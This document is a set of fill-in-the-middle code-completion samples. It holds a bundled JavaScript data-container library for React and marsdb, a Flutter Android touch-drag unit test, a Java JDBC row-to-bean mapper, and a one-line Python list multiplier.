          prop.removeCursorTracker();
          stopper();
        }
      });
    }

    /**
     * Returns the current active context, set by `withinContext`
     * @return {ExecutionContext}
     */

  }], [{
    key: 'getCurrentContext',
    value: function getCurrentContext() {
      return ExecutionContext.__currentContext;
    }
  }]);

  return ExecutionContext;
}(_marsdb.EventEmitter);

exports.default = ExecutionContext;

},{"./utils":5,"fast.js/forEach":9,"fast.js/map":11,"fast.js/object/keys":14,"invariant":16,"marsdb":undefined}],3:[function(require,module,exports){
'use strict';

Object.defineProperty(exports, "__esModule", {
  value: true
});

var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

var _keys2 = require('fast.js/object/keys');

var _keys3 = _interopRequireDefault(_keys2);

var _forEach = require('fast.js/forEach');

var _forEach2 = _interopRequireDefault(_forEach);

var _map2 = require('fast.js/map');

var _map3 = _interopRequireDefault(_map2);

var _marsdb = require('marsdb');

var _invariant = require('invariant');

var _invariant2 = _interopRequireDefault(_invariant);

var _ExecutionContext = require('./ExecutionContext');

var _ExecutionContext2 = _interopRequireDefault(_ExecutionContext);

function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; }

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }

/**
 * By the given fragments object, variables and containerClass
 * creates a query executor.
 * It will execute each fragment of the fragments object and
 * return a promise that will be resolved when all fragments
 * are filled with data.
 *
 * A container class is an object with one static function – `getFragment` –
 * that must return a property function. From all constructed properties
 * a Promise is made that resolves when every `prop.promise` resolves.
 *
 * The class extends `EventEmitter`. Only one event may be emitted – `update`.
 * The event is emitted when query data is updated, and it arrives with an object
 * of properties for each fragment.
 */

var QueryExecutor = function (_EventEmitter) {
  _inherits(QueryExecutor, _EventEmitter);

  function QueryExecutor(fragments, initVarsOverride, containerClass, prepareVariables) {
    _classCallCheck(this, QueryExecutor);

    var _this = _possibleConstructorReturn(this, Object.getPrototypeOf(QueryExecutor).call(this));

    _this.containerClass = containerClass;
    _this.fragmentNames = (0, _keys3.default)(fragments);
    _this.initVarsOverride = initVarsOverride;
    _this.context = new _ExecutionContext2.default();
    _this.variables = _this.context.getVariables(containerClass, initVarsOverride, {}, prepareVariables);
    _this._handleDataChanges = (0, _marsdb.debounce)(_this._handleDataChanges.bind(_this), 1000 / 60, 5);
    return _this;
  }

  /**
   * Changes the batch size of the updater.
   * Batch size is the number of changes that must happen
   * in the debounce interval to force execution of the debounced
   * function (an update of the result, in our case).
   *
   * @param {Number} batchSize
   * @return {CursorObservable}
   */

  _createClass(QueryExecutor, [{
    key: 'batchSize',
    value: function batchSize(_batchSize) {
      this._handleDataChanges.updateBatchSize(_batchSize);
      return this;
    }

    /**
     * Changes the debounce wait time of the updater
     * @param {Number} waitTime
     * @return {CursorObservable}
     */

  }, {
    key: 'debounce',
    value: function debounce(waitTime) {
      this._handleDataChanges.updateWait(waitTime);
      return this;
    }

    /**
     * Executes the query and returns a Promise that resolves
     * when all props are filled with data.
     * If the query is already executing it just returns the promise
     * for the currently executing query.
     * @return {Promise}
     */

  }, {
    key: 'execute',
    value: function execute() {
      var _this2 = this;

      if (!this._execution) {
        (function () {
          _this2.result = {};
          _this2.context.withinContext(function () {
            (0, _forEach2.default)(_this2.fragmentNames, function (k) {
              _this2.result[k] = _this2.containerClass.getFragment(k);
            });
          });

          var updater = function updater() {
            _this2._execution = _this2._handleDataChanges();
          };

          _this2._stoppers = (0, _map3.default)(_this2.fragmentNames, function (k) {
            return _this2.result[k].addChangeListener(updater);
          });

          updater();
        })();
      }

      return this._execution;
    }

    /**
     * Stops query execution and listening for changes.
     * Returns a promise resolved when the query has stopped.
     * @return {Promise}
     */

  }, {
    key: 'stop',
    value: function stop() {
      var _this3 = this;

      (0, _invariant2.default)(this._execution, 'stop(...): query is not executing');

      // Remove all update listeners synchronously to avoid
      // updates of old data
      this.removeAllListeners();

      return this._execution.then(function () {
        (0, _forEach2.default)(_this3._stoppers, function (stop) {
          return stop();
        });
        _this3.context.emitCleanup();
        _this3._execution = null;
      });
    }

    /**
     * Updates the top level variables of the query by setting
     * values in variable props from the given object. If a field
     * exists in the given object but not in the variables map
     * then it will be ignored.
* @param {Object} nextProps * @return {Promise} resolved when variables updated */ }, { key: 'updateVariables', value: function updateVariables(nextProps) { var _this4 = this; (0, _invariant2.default)(this._execution, 'updateVariables(...): query is not executing'); return this._execution.then(function () { var updated = false; (0, _forEach2.default)(nextProps, function (prop, k) { if (_this4.variables[k] && _this4.variables[k]() !== prop) { _this4.variables[k](prop); updated = true; } }); return updated; }); } /** * The method is invoked when some of fragment's property is updated. * It emits an `update` event only when all `prop.promise` is resolved. */ }, { key: '_handleDataChanges', value: function _handleDataChanges() { var _this5 = this; var nextPromises = (0, _map3.default)(this.fragmentNames, function (k) { return _this5.result[k].promise; }); var resultPromise = Promise.all(nextPromises).then(function () { if (_this5._resultPromise === resultPromise) { _this5.emit('update', _this5.result); } return _this5.result; }, function (error) { _this5.emit('error', error); return _this5.result; }); this._resultPromise = resultPromise; return this._resultPromise; } }]); return QueryExecutor; }(_marsdb.EventEmitter); exports.default = QueryExecutor; },{"./ExecutionContext":2,"fast.js/forEach":9,"fast.js/map":11,"fast.js/object/keys":14,"invariant":16,"marsdb":undefined}],4:[function(require,module,exports){ 'use strict'; Object.defineProperty(exports, "__esModule", { value: true }); var _typeof = typeof Symbol === "function" && typeof Symbol.iterator === "symbol" ? function (obj) { return typeof obj; } : function (obj) { return obj && typeof Symbol === "function" && obj.constructor === Symbol ? "symbol" : typeof obj; }; var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; }; var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }(); exports.default = createContainer; var _keys2 = require('fast.js/object/keys'); var _keys3 = _interopRequireDefault(_keys2); var _assign2 = require('fast.js/object/assign'); var _assign3 = _interopRequireDefault(_assign2); var _react = require('react'); var _react2 = _interopRequireDefault(_react); var _invariant = require('invariant'); var _invariant2 = _interopRequireDefault(_invariant); var _ExecutionContext = require('./ExecutionContext'); var _ExecutionContext2 = _interopRequireDefault(_ExecutionContext); var _QueryExecutor = require('./QueryExecutor'); var _QueryExecutor2 = _interopRequireDefault(_QueryExecutor); var _utils = require('./utils'); var utils = _interopRequireWildcard(_utils); function _interopRequireWildcard(obj) { if (obj && obj.__esModule) { return obj; } else { var newObj = {}; if (obj != null) { for (var key in obj) { if (Object.prototype.hasOwnProperty.call(obj, key)) newObj[key] = obj[key]; } } newObj.default = obj; return newObj; } } function 
_interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } } function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; } function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; } /** * High-order data container creator * @param {Component} Component * @param {Object} options.fragments * @param {Object} options.initVars * @return {Component} */ function createContainer(Component, _ref) { var _ref$fragments = _ref.fragments; var fragments = _ref$fragments === undefined ? {} : _ref$fragments; var _ref$initialVariables = _ref.initialVariables; var initialVariables = _ref$initialVariables === undefined ? {} : _ref$initialVariables; var _ref$prepareVariables = _ref.prepareVariables; var prepareVariables = _ref$prepareVariables === undefined ? null : _ref$prepareVariables; var componentName = Component.displayName || Component.name; var containerName = 'Mars(' + componentName + ')'; var fragmentKeys = (0, _keys3.default)(fragments); var Container = function (_React$Component) { _inherits(Container, _React$Component); function Container() { _classCallCheck(this, Container); return _possibleConstructorReturn(this, Object.getPrototypeOf(Container).apply(this, arguments)); } _createClass(Container, [{ key: 'render', value: function render() { var variables = this.props[fragmentKeys[0]].context.getVariables(Container); return _react2.default.createElement(Component, _extends({}, this.props, { variables: variables })); } }], [{ key: 'getFragment', value: function getFragment(name, mapping) { var initVarsOverride = arguments.length <= 2 || arguments[2] === undefined ? {} : arguments[2]; var parentContext = arguments[3]; <|fim▁hole|> var fragment = fragments[name]; var initVars = (0, _assign3.default)({}, initialVariables, initVarsOverride); var vars = childContext.getVariables(Container, initVars, mapping, prepareVariables); (0, _invariant2.default)(typeof fragment === 'function' || (typeof fragment === 'undefined' ? 'undefined' : _typeof(fragment)) === 'object', 'getFragment(...): a fragment must be a function or an object'); if ((typeof fragment === 'undefined' ? 'undefined' : _typeof(fragment)) === 'object') { return utils._getJoinFunction(Container, fragment, vars, childContext); } else { return utils._getFragmentValue(Container, fragment, vars, childContext); } } }, { key: 'getQuery', value: function getQuery() { var initVarsOverride = arguments.length <= 0 || arguments[0] === undefined ? 
{} : arguments[0]; var initVars = (0, _assign3.default)({}, initialVariables, initVarsOverride); return new _QueryExecutor2.default(fragments, initVars, Container, prepareVariables); } }]); return Container; }(_react2.default.Component); Container.displayName = containerName; return Container; } },{"./ExecutionContext":2,"./QueryExecutor":3,"./utils":5,"fast.js/object/assign":12,"fast.js/object/keys":14,"invariant":16,"react":undefined}],5:[function(require,module,exports){ 'use strict'; Object.defineProperty(exports, "__esModule", { value: true }); exports.noop = undefined; var _typeof = typeof Symbol === "function" && typeof Symbol.iterator === "symbol" ? function (obj) { return typeof obj; } : function (obj) { return obj && typeof Symbol === "function" && obj.constructor === Symbol ? "symbol" : typeof obj; }; exports._isProperty = _isProperty; exports._isCursor = _isCursor; exports._getFragmentValue = _getFragmentValue; exports._getJoinFunction = _getJoinFunction; exports._createProperty = _createProperty; exports._createPropertyWithContext = _createPropertyWithContext; var _forEach = require('fast.js/forEach'); var _forEach2 = _interopRequireDefault(_forEach); var _map2 = require('fast.js/map'); var _map3 = _interopRequireDefault(_map2); var _keys2 = require('fast.js/object/keys'); var _keys3 = _interopRequireDefault(_keys2); var _marsdb = require('marsdb'); var _CursorObservable = require('marsdb/dist/CursorObservable'); var _CursorObservable2 = _interopRequireDefault(_CursorObservable); function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } // Internals var _propertyVersionId = 0; var noop = exports.noop = function noop() {}; // eslint-disable-line /** * Return true if given value is a property * @param {Object} val * @return {Boolean} */ function _isProperty(val) { return typeof val === 'function' && !!val.isProperty; } /** * Return true if given value is a CursorObservable * @param {OBject} val * @return {Boolean} */ function _isCursor(val) { return val instanceof _CursorObservable2.default; } /** * Return a property, that updated when value * of fragment changed or variable changed. It do nothing * if generated value is already a property (just returns * the property). * * @param {Class} containerClass * @param {Function} valueGenerator * @param {Object} vars * @param {ExecutionContext} context * @return {Property} */ function _getFragmentValue(containerClass, valueGenerator, vars, context) { var _createFragmentProp = function _createFragmentProp() { var value = context.withinContext(function () { return valueGenerator(vars); }); var prop = undefined; if (_isProperty(value)) { prop = value; } else { prop = _createPropertyWithContext(null, context); if (_isCursor(value)) { context.trackCursorChange(prop, value); } else { prop(value); } context.trackVariablesChange(prop, vars, valueGenerator); } return prop; }; if (vars.promise) { var _ret = function () { var proxyProp = _createPropertyWithContext(null, context); proxyProp.promise = vars.promise.then(function () { var fragProp = _createFragmentProp(); if (fragProp() !== null) { proxyProp.emitChange(); } proxyProp.proxyTo(fragProp); return fragProp.promise; }); return { v: proxyProp }; }(); if ((typeof _ret === 'undefined' ? 'undefined' : _typeof(_ret)) === "object") return _ret.v; } else { return _createFragmentProp(); } } /** * Return a function that join the result of given joinObj. 
* @param {Class} containerClass * @param {Object} joinObj * @param {Object} vars * @param {ExecutionContext} context * @return {Function} */ function _getJoinFunction(containerClass, joinObj, vars, context) { var joinObjKeys = (0, _keys3.default)(joinObj); return function (doc) { var updated = arguments.length <= 1 || arguments[1] === undefined ? noop : arguments[1]; if ((typeof doc === 'undefined' ? 'undefined' : _typeof(doc)) === 'object' && doc !== null) { return (0, _map3.default)(joinObjKeys, function (k) { if (doc[k] === undefined) { var _ret2 = function () { var valueGenerator = function valueGenerator(opts) { return joinObj[k](doc, opts); }; var prop = _getFragmentValue(containerClass, valueGenerator, vars, context); doc[k] = prop; return { v: Promise.resolve(prop.promise).then(function (res) { var changeStopper = prop.addChangeListener(updated); var cleanStopper = context.addCleanupListener(function (isRoot) { if (!isRoot) { cleanStopper(); changeStopper(); } }); return res; }) }; }(); if ((typeof _ret2 === 'undefined' ? 'undefined' : _typeof(_ret2)) === "object") return _ret2.v; } }); } }; } /** * Creates a getter-setter property function. * The function returns current value if called without * arguments. If first argument passed then it sets new * value and returns new value. * * On set of a new value it emits a change event. You can * listen on a change event by calling `addChangeListener` * which adds a change event handler that returns a function * for stopping listening. * * A property also have a `version` field. It's a unique value * across all active properties. A version is changed when * property have changed before emitting change event. * * @param {Mixed} initValue * @return {Property} */ function _createProperty(initValue) { var emitter = new _marsdb.EventEmitter(); var store = initValue; var proxyProp = null; var prop = function prop() { if (proxyProp) { return proxyProp.apply(null, arguments); } else { if (arguments.length > 0) { store = arguments[0]; if (arguments.length === 1) { prop.emitChange(); } } return store; } }; prop.emitChange = function () { prop.version = ++_propertyVersionId; emitter.emit('change'); }; prop.addChangeListener = function (func) { emitter.on('change', func); return function () { emitter.removeListener('change', func); }; }; prop.proxyTo = function (toProp) { proxyProp = toProp; Object.defineProperty(prop, 'version', { get: function get() { return toProp.version; }, set: function set(newValue) { return toProp.version = newValue; } }); prop.addChangeListener = toProp.addChangeListener; prop.emitChange = toProp.emitChange; (0, _forEach2.default)(emitter.listeners('change'), function (cb) { return toProp.addChangeListener(cb); }); emitter = toProp.__emitter; store = null; }; prop.version = ++_propertyVersionId; prop.isProperty = true; prop.__emitter = emitter; return prop; } /** * Create a property that holds given value and context. 
* @param {Mixed} value * @param {ExecutionContext} context * @return {Property} */ function _createPropertyWithContext(value, context) { var nextProp = _createProperty(value); nextProp.context = context; return nextProp; } },{"fast.js/forEach":9,"fast.js/map":11,"fast.js/object/keys":14,"marsdb":undefined,"marsdb/dist/CursorObservable":undefined}],6:[function(require,module,exports){ var createContainer = require('./dist/createContainer').default; var DataManagerContainer = require('./dist/DataManagerContainer').default; module.exports = { __esModule: true, createContainer: createContainer, DataManagerContainer: DataManagerContainer }; },{"./dist/DataManagerContainer":1,"./dist/createContainer":4}],7:[function(require,module,exports){ 'use strict'; var bindInternal3 = require('../function/bindInternal3'); /** * # For Each * * A fast `.forEach()` implementation. * * @param {Array} subject The array (or array-like) to iterate over. * @param {Function} fn The visitor function. * @param {Object} thisContext The context for the visitor. */ module.exports = function fastForEach (subject, fn, thisContext) { var length = subject.length, iterator = thisContext !== undefined ? bindInternal3(fn, thisContext) : fn, i; for (i = 0; i < length; i++) { iterator(subject[i], i, subject); } }; },{"../function/bindInternal3":10}],8:[function(require,module,exports){ 'use strict'; var bindInternal3 = require('../function/bindInternal3'); /** * # Map * * A fast `.map()` implementation. * * @param {Array} subject The array (or array-like) to map over. * @param {Function} fn The mapper function. * @param {Object} thisContext The context for the mapper. * @return {Array} The array containing the results. */ module.exports = function fastMap (subject, fn, thisContext) { var length = subject.length, result = new Array(length), iterator = thisContext !== undefined ? bindInternal3(fn, thisContext) : fn, i; for (i = 0; i < length; i++) { result[i] = iterator(subject[i], i, subject); } return result; }; },{"../function/bindInternal3":10}],9:[function(require,module,exports){ 'use strict'; var forEachArray = require('./array/forEach'), forEachObject = require('./object/forEach'); /** * # ForEach * * A fast `.forEach()` implementation. * * @param {Array|Object} subject The array or object to iterate over. * @param {Function} fn The visitor function. * @param {Object} thisContext The context for the visitor. */ module.exports = function fastForEach (subject, fn, thisContext) { if (subject instanceof Array) { return forEachArray(subject, fn, thisContext); } else { return forEachObject(subject, fn, thisContext); } }; },{"./array/forEach":7,"./object/forEach":13}],10:[function(require,module,exports){ 'use strict'; /** * Internal helper to bind a function known to have 3 arguments * to a given context. */ module.exports = function bindInternal3 (func, thisContext) { return function (a, b, c) { return func.call(thisContext, a, b, c); }; }; },{}],11:[function(require,module,exports){ 'use strict'; var mapArray = require('./array/map'), mapObject = require('./object/map'); /** * # Map * * A fast `.map()` implementation. * * @param {Array|Object} subject The array or object to map over. * @param {Function} fn The mapper function. * @param {Object} thisContext The context for the mapper. * @return {Array|Object} The array or object containing the results. 
*/ module.exports = function fastMap (subject, fn, thisContext) { if (subject instanceof Array) { return mapArray(subject, fn, thisContext); } else { return mapObject(subject, fn, thisContext); } }; },{"./array/map":8,"./object/map":15}],12:[function(require,module,exports){ 'use strict'; /** * Analogue of Object.assign(). * Copies properties from one or more source objects to * a target object. Existing keys on the target object will be overwritten. * * > Note: This differs from spec in some important ways: * > 1. Will throw if passed non-objects, including `undefined` or `null` values. * > 2. Does not support the curious Exception handling behavior, exceptions are thrown immediately. * > For more details, see: * > https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/assign * * * * @param {Object} target The target object to copy properties to. * @param {Object} source, ... The source(s) to copy properties from. * @return {Object} The updated target object. */ module.exports = function fastAssign (target) { var totalArgs = arguments.length, source, i, totalKeys, keys, key, j; for (i = 1; i < totalArgs; i++) { source = arguments[i]; keys = Object.keys(source); totalKeys = keys.length; for (j = 0; j < totalKeys; j++) { key = keys[j]; target[key] = source[key]; } } return target; }; },{}],13:[function(require,module,exports){ 'use strict'; var bindInternal3 = require('../function/bindInternal3'); /** * # For Each * * A fast object `.forEach()` implementation. * * @param {Object} subject The object to iterate over. * @param {Function} fn The visitor function. * @param {Object} thisContext The context for the visitor. */ module.exports = function fastForEachObject (subject, fn, thisContext) { var keys = Object.keys(subject), length = keys.length, iterator = thisContext !== undefined ? bindInternal3(fn, thisContext) : fn, key, i; for (i = 0; i < length; i++) { key = keys[i]; iterator(subject[key], key, subject); } }; },{"../function/bindInternal3":10}],14:[function(require,module,exports){ 'use strict'; /** * Object.keys() shim for ES3 environments. * * @param {Object} obj The object to get keys for. * @return {Array} The array of keys. */ module.exports = typeof Object.keys === "function" ? Object.keys : /* istanbul ignore next */ function fastKeys (obj) { var keys = []; for (var key in obj) { if (Object.prototype.hasOwnProperty.call(obj, key)) { keys.push(key); } } return keys; }; },{}],15:[function(require,module,exports){ 'use strict'; var bindInternal3 = require('../function/bindInternal3'); /** * # Map * * A fast object `.map()` implementation. * * @param {Object} subject The object to map over. * @param {Function} fn The mapper function. * @param {Object} thisContext The context for the mapper. * @return {Object} The new object containing the results. */ module.exports = function fastMapObject (subject, fn, thisContext) { var keys = Object.keys(subject), length = keys.length, result = {}, iterator = thisContext !== undefined ? bindInternal3(fn, thisContext) : fn, i, key; for (i = 0; i < length; i++) { key = keys[i]; result[key] = iterator(subject[key], key, subject); } return result; }; },{"../function/bindInternal3":10}],16:[function(require,module,exports){ /** * Copyright 2013-2015, Facebook, Inc. * All rights reserved. * * This source code is licensed under the BSD-style license found in the * LICENSE file in the root directory of this source tree. An additional grant * of patent rights can be found in the PATENTS file in the same directory. 
*/ 'use strict'; /** * Use invariant() to assert state which your program assumes to be true. * * Provide sprintf-style format (only %s is supported) and arguments * to provide information about what broke and what you were * expecting. * * The invariant message will be stripped in production, but the invariant * will remain to ensure logic does not differ in production. */ var invariant = function(condition, format, a, b, c, d, e, f) { if ("production" !== 'production') { if (format === undefined) { throw new Error('invariant requires an error message argument'); } } if (!condition) { var error; if (format === undefined) { error = new Error( 'Minified exception occurred; use the non-minified dev environment ' + 'for the full error message and additional helpful warnings.' ); } else { var args = [a, b, c, d, e, f]; var argIndex = 0; error = new Error( format.replace(/%s/g, function() { return args[argIndex++]; }) ); error.name = 'Invariant Violation'; } error.framesToPop = 1; // we don't care about invariant's own frame throw error; } }; module.exports = invariant; },{}]},{},[6])(6) });<|fim▁end|>
parentContext = parentContext || _ExecutionContext2.default.getCurrentContext(); (0, _invariant2.default)(parentContext, 'getFragment(...): must be invoked within some context'); var childContext = parentContext.createChildContext();
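For reference, the getter-setter property implemented by `_createProperty` in the bundled utils module above can be exercised as in the following minimal sketch. This is an illustration only: it assumes `_createProperty` is accessible from the bundle's utils export, and the variable names are hypothetical.

var prop = _createProperty(1);                    // getter-setter holding the initial value 1
console.log(prop());                              // called without arguments: reads the value -> 1
var stop = prop.addChangeListener(function () {
  console.log('changed, version:', prop.version); // runs after each set; version is bumped before the emit
});
prop(2);                                          // called with one argument: stores 2 and emits 'change'
stop();                                           // the returned function detaches the listener

The `version` counter is unique across all active properties and bumps on every change, presumably so consumers can detect a changed fragment value by comparing version numbers instead of deep-comparing the data.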
<|file_name|>FlutterMutatorViewTest.java<|end_file_name|><|fim▁begin|>package io.flutter.embedding.engine.mutatorsstack; import static junit.framework.TestCase.*; import static org.mockito.Mockito.*; import android.graphics.Matrix; import android.view.MotionEvent; import io.flutter.embedding.android.AndroidTouchProcessor; import org.junit.Test; import org.junit.runner.RunWith; import org.mockito.ArgumentCaptor; import org.robolectric.RobolectricTestRunner; import org.robolectric.RuntimeEnvironment; import org.robolectric.annotation.Config; @Config(manifest = Config.NONE) @RunWith(RobolectricTestRunner.class) public class FlutterMutatorViewTest { @Test public void canDragViews() { final AndroidTouchProcessor touchProcessor = mock(AndroidTouchProcessor.class); final FlutterMutatorView view = new FlutterMutatorView(RuntimeEnvironment.systemContext, 1.0f, touchProcessor); final FlutterMutatorsStack mutatorStack = mock(FlutterMutatorsStack.class); assertTrue(view.onInterceptTouchEvent(mock(MotionEvent.class))); { view.readyToDisplay(mutatorStack, /*left=*/ 1, /*top=*/ 2, /*width=*/ 0, /*height=*/ 0); view.onTouchEvent(MotionEvent.obtain(0, 0, MotionEvent.ACTION_DOWN, 0.0f, 0.0f, 0)); final ArgumentCaptor<Matrix> matrixCaptor = ArgumentCaptor.forClass(Matrix.class); verify(touchProcessor).onTouchEvent(any(), matrixCaptor.capture()); final Matrix screenMatrix = new Matrix(); screenMatrix.postTranslate(1, 2); assertTrue(matrixCaptor.getValue().equals(screenMatrix)); } reset(touchProcessor); { view.readyToDisplay(mutatorStack, /*left=*/ 3, /*top=*/ 4, /*width=*/ 0, /*height=*/ 0); view.onTouchEvent(MotionEvent.obtain(0, 0, MotionEvent.ACTION_MOVE, 0.0f, 0.0f, 0)); final ArgumentCaptor<Matrix> matrixCaptor = ArgumentCaptor.forClass(Matrix.class); verify(touchProcessor).onTouchEvent(any(), matrixCaptor.capture()); final Matrix screenMatrix = new Matrix(); screenMatrix.postTranslate(1, 2); assertTrue(matrixCaptor.getValue().equals(screenMatrix)); } reset(touchProcessor); { view.readyToDisplay(mutatorStack, /*left=*/ 5, /*top=*/ 6, /*width=*/ 0, /*height=*/ 0); view.onTouchEvent(MotionEvent.obtain(0, 0, MotionEvent.ACTION_MOVE, 0.0f, 0.0f, 0)); final ArgumentCaptor<Matrix> matrixCaptor = ArgumentCaptor.forClass(Matrix.class); verify(touchProcessor).onTouchEvent(any(), matrixCaptor.capture()); final Matrix screenMatrix = new Matrix(); screenMatrix.postTranslate(3, 4); assertTrue(matrixCaptor.getValue().equals(screenMatrix)); } reset(touchProcessor); { view.readyToDisplay(mutatorStack, /*left=*/ 7, /*top=*/ 8, /*width=*/ 0, /*height=*/ 0); view.onTouchEvent(MotionEvent.obtain(0, 0, MotionEvent.ACTION_DOWN, 0.0f, 0.0f, 0)); final ArgumentCaptor<Matrix> matrixCaptor = ArgumentCaptor.forClass(Matrix.class); verify(touchProcessor).onTouchEvent(any(), matrixCaptor.capture());<|fim▁hole|> final Matrix screenMatrix = new Matrix(); screenMatrix.postTranslate(7, 8); assertTrue(matrixCaptor.getValue().equals(screenMatrix)); } } }<|fim▁end|>
<|file_name|>RecordHandlerImpl.java<|end_file_name|><|fim▁begin|>package fw.db.connection.impl; import fw.common.util.CE; import fw.common.util.LE; import fw.db.connection.DBException; import fw.db.connection.RecordHandler; import java.sql.ResultSet; import java.sql.ResultSetMetaData; /** * 通用的EntityBean查询映射处理类<br/> * NOTE: 给定的Entity必须符合STREET规定的命名规则 * @author dzb * * @param <T> */ class RecordHandlerImpl<T> implements RecordHandler<T> { private final CE<T> ce; //private String[] propNames = nul public RecordHandlerImpl(Class<T> classOfT) { ce = CE.of(classOfT);<|fim▁hole|> } public T mapping(ResultSet rs, int row) throws DBException { try { ResultSetMetaData rsm = rs.getMetaData(); String[] columnNames = new String[rsm.getColumnCount()]; for (int i=0; i<rsm.getColumnCount(); i++){ columnNames[i] = rsm.getColumnName(i+1).toLowerCase(); } T bean = ce.create(); for (String cn : columnNames) { Object v = rs.getObject(cn); String fn = DBUtils.convColumnNameToPropertyName(cn); // TODO think about the comment block check logic // Field field = ce.getField(fn); // v = LE.coerce(v, field.getType()); LE.setPropertyValue(bean, fn, v); } return bean; } catch (Throwable e) { throw new DBException(e); } } }<|fim▁end|>
//propNames =LE.getPropertyNames(classOfT);
<|file_name|>multiply_list_by_integer_with_restrictions.py<|end_file_name|><|fim▁begin|>from operator import mul<|fim▁hole|><|fim▁end|>
def multiply(n, l): return map(lambda a: mul(a, n), l)